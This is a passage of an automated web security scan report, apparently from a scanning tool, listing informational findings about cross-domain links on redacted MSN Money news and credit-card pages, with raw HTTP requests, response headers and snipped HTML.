http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bloomberg.com/news/2010-12-21/shell-qatar-to-sign-agreement-today-for-major-petrochemical-project.html?cmpid=msnmoney
http://www.businessweek.com/bwdaily/headlinefeed.js
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410205&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fbusiness-news%2Farticle.aspx%3Ffeed%3DAP%26date%3D20110129%26id%3D12845569&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

22.180. http://money.redacted/business-news/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/business-news/news.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/business-news/news.aspx?briefing=inplay

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353443&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fbusiness-news%2Fnews.aspx%3Fbriefing%3Dinplay&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

GET /business-news/news.aspx?briefing=inplay HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

22.181. http://money.redacted/business-news/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/business-news/news.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/business-news/news.aspx?symbol={0}&q={0}

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353448&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fbusiness-news%2Fnews.aspx%3Fsymbol%3D%257B0%257D%26q%3D%257B0%257D&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

GET /business-news/news.aspx?symbol={0}&q={0} HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

22.182. http://money.redacted/business-news/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/business-news/news.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/business-news/news.aspx?briefing=inplay

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410202&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fbusiness-news%2Fnews.aspx%3Fbriefing%3Dinplay&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

22.183. http://money.redacted/business-news/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/business-news/news.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/business-news/news.aspx?symbol={0}&q={0}

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410204&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fbusiness-news%2Fnews.aspx%3Fsymbol%3D%257B0%257D%26q%3D%257B0%257D&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

22.184. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://us.social.s-msn.com/s/images/bluemannxl.png
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&go=&form=money3
http://www.bing.com/search?q=bank+of+america&form=MSMONY
http://www.bing.com/search?q=citi&form=MSMONY
http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&form=money3
http://www.bing.com/search?q=perfect+credit+score&form=money3
http://www.bing.com/search?q=personal+finance+twitter&form=MSMONY
http://www.bing.com/search?q=wells+fargo&form=MSMONY
http://www.bing.com/search?q=what+is+a+fico+credit+score&form=money3
http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&form=money3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.creditcards.com/?aid=46bf5df1
http://www.creditcards.com/credit-card-news/change-financial-bad-habits-8-steps-1281.php?aid=46bf5df1
http://www.creditcards.com/credit-card-news/dispute-credit-card-product-merchant-1282.php?aid=46bf5df1
http://www.creditcards.com/credit-card-news/foreign-exchange-fees-going-up-1267.php?aid=46bf5df1
http://www.delish.com/
http://www.facebook.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.twitter.com/
http://www.visible-banking.com/
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344880&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fcredit-cards%2FTwitter-credit-card-problem-solver-credit-cards.aspx%3FGT1%3D33001&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=8dcfafeb0d9747cb8848c127cabb0f72; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:59 GMT
Content-Length: 81683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344880&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fcredit-cards%2FTwitter-credit-card-problem-solver-credit-cards.aspx%3FGT1%3D33001&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<cite>By <a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew">CreditCards.com</a>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew"><img src="http://colstb.msn.com/i/7E/1944B57464FBD948FCCE16DB38BB4.jpg" width="120" height="30" alt="CreditCards.com on MSN Money" />
...[SNIP]...
<p>Why wait on endless hold to dispute a credit card fee over the phone when you can post your complaint on <a class="opennew" href="http://www.twitter.com/">Twitter</a>
...[SNIP]...
<p>Most major banks in the United States, including <a class="opennew" href="http://www.bing.com/search?q=wells+fargo&form=MSMONY">Wells Fargo</a>, <a class="opennew" href="http://www.bing.com/search?q=bank+of+america&form=MSMONY">Bank of America</a> and <a class="opennew" href="http://www.bing.com/search?q=citi&form=MSMONY">Citi</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&form=MSMONY" class="opennew"><img src="http://moneycentral.redacted/content/data/images/Thumbnail/bingLogo-60.gif" width="60" height="27" alt="Search for personal finance on Twitter on Bing" class="img1" />
...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&form=MSMONY" class="opennew">Personal finance on Twitter</a>
...[SNIP]...
messages can be helpful. "Customer service is one of the most logical and valuable uses of Twitter," says Christophe Langlois, who tracks the social media use of financial institutions on the website <a class="opennew" href="http://www.Visible-Banking.com/">Visible-Banking</a>
...[SNIP]...
<p>Like most major financial institutions, MasterCard has channels on Twitter and <a class="opennew" href="http://www.facebook.com/">Facebook</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/dispute-credit-card-product-merchant-1282.php?aid=46bf5df1" class="opennew">How to dispute a credit card bill with a merchant</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/change-financial-bad-habits-8-steps-1281.php?aid=46bf5df1" class="opennew">How to change financial bad habits in 8 steps </a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/foreign-exchange-fees-going-up-1267.php?aid=46bf5df1" class="opennew">Credit card foreign transaction fees going up </a>
...[SNIP]...
'True','1');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?page=2&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
','0');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?page=2&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHbIFZX69e-qNzxvkIyimvEbvjpCVpW6S?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGoG-LEpQfUy6k-KMKBYowSsHdlMkNkJh?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XTTBewGalOM4CqQLRfE7MRRgpeJSYNQ8u?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X7V_Rv-PpYCuEZxovOFi02qEgNUb2tziQ?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XRKEouVn3wnqlwUUAegcxQYTdNJy-p03z?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&form=money3">What is the best way to establish credit?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+a+fico+credit+score&form=money3">What is a FICO credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=perfect+credit+score&form=money3">What is a perfect credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&go=&form=money3">How do I get a free credit report?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&form=money3">How do I dispute items on my credit report?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.185. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://cid-42c4e20842732b88.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://us.social.s-msn.com/s/images/bluemannxl.png
http://us.social.s-msn.com/s/images/emoticons/regular_smile.gif
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&go=&form=money3
http://www.bing.com/search?q=bank+of+america&form=MSMONY
http://www.bing.com/search?q=citi&form=MSMONY
http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&form=money3
http://www.bing.com/search?q=perfect+credit+score&form=money3
http://www.bing.com/search?q=personal+finance+twitter&form=MSMONY
http://www.bing.com/search?q=wells+fargo&form=MSMONY
http://www.bing.com/search?q=what+is+a+fico+credit+score&form=money3
http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&form=money3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.creditcards.com/?aid=46bf5df1
http://www.creditcards.com/credit-card-news/change-financial-bad-habits-8-steps-1281.php?aid=46bf5df1
http://www.creditcards.com/credit-card-news/dispute-credit-card-product-merchant-1282.php?aid=46bf5df1
http://www.creditcards.com/credit-card-news/foreign-exchange-fees-going-up-1267.php?aid=46bf5df1
http://www.delish.com/
http://www.facebook.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.twitter.com/
http://www.visible-banking.com/
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410115&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fcredit-cards%2FTwitter-credit-card-problem-solver-credit-cards.aspx%3FGT1%3D33001&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

GET /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:55:15 GMT
Content-Length: 114301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
